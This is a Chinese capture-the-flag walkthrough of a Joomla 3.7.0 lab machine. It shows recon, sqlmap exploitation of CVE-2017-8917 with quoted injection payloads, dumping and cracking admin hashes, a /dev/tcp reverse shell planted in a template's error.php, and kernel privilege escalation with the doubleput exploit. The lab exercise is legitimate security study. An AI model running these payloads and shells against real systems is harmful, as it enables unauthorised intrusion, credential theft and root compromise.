信息搜集

首先信息搜集,扫描网段发现靶机ip192.168.100.136

1
arp-scan -l

image-20260605163240098

nmap扫一下端口

1
nmap -sV 192.168.100.136

image-20260605163437898

开放了80端口,web指纹信息

1
whatweb -v 192.168.100.136

image-20260605164005772

Web 服务:Apache/2.4.18 (Ubuntu)

CMS:Joomla 全站程序(MetaGenerator 标识)

前端组件:Bootstrap、jQuery、HTML5

页面存在密码输入框PasswordField[password]/administrator后台登录页存在

image-20260605170045350

存在 Joomla 会话 Cookie,确认站点正常运行

访问一下网站

image-20260605164153381

这次只有一个 flag,一个入口点,没有任何线索。

要拿到 flag,你显然需要获得 root 权限。

如何获得 root 权限取决于你——当然,也取决于系统。

祝你好运——希望你能享受这个小挑战。:-)

漏洞利用

分析知道cms是Joomla,使用joomscan分析下版本

1
joomscan -url 192.168.100.136

image-20260605171220500

查找一下相关漏洞

1
searchsploit joomla 3.7.0

image-20260605172059571

存在sql注入漏洞,看一下exp,路径在/usr/share/exploitdb/exploits/php/webapps/42033.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

根据提示是用sqlmap跑一下

1
sqlmap -u "http://192.168.100.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test" --risk=3 --level=5 --random-agent --dbs -p "list[fullordering]"

image-20260605172843424

得到数据库名,接下来就可以爆表了

1
sqlmap -u "http://192.168.100.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test" --risk=3 --level=5 --random-agent -D joomladb --tables --batch

image-20260605172958506

1
sqlmap -u "http://192.168.100.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users"  --columns  

image-20260605173738171

查询一下username,password

1
2
sqlmap -u "http://192.168.100.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "username,password" --dump 

image-20260605185755852

储存的的是哈希,爆破一下

image-20260605190046378

admin/snoopy,进入后台

image-20260605191812026

在Templates

image-20260605192456061

任选模板,可以在error.php文件中写入

1
system("bash -c 'bash -i >& /dev/tcp/192.168.100.128/7777 0>&1'");

kali开启监听

1
nc -lvvnp 7777

访问http://192.168.100.136 /templates/bezz3/error.php

image-20260605193502757

接下来需要提权

1
find / -perm -u=s -type f 2>/dev/null

image-20260605194158269

并没有用可以提取的命令,换一种提权方式,

1
cat /proc/version

image-20260605195459552

1
cat /etc/issue

image-20260605195739254

Ubuntu 16.04,使用msf找一下有没有漏洞

image-20260605200454836

这是4.4.x通用的提权方式,路径/usr/share/exploitdb/exploits/linux/local/39772.txt,根据txt描述的操作就行,

1
2
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
unzip 39772.zip

image-20260605201608172

需要将exploit.tar这个文件上传的目标主机并且运行,起一个http服务

image-20260605202118555

image-20260605202327484

然后解压

image-20260605202742838

进入到解压目录后执行操作

1
2
./compile.sh
./doubleput

image-20260605203134168

image-20260605203207477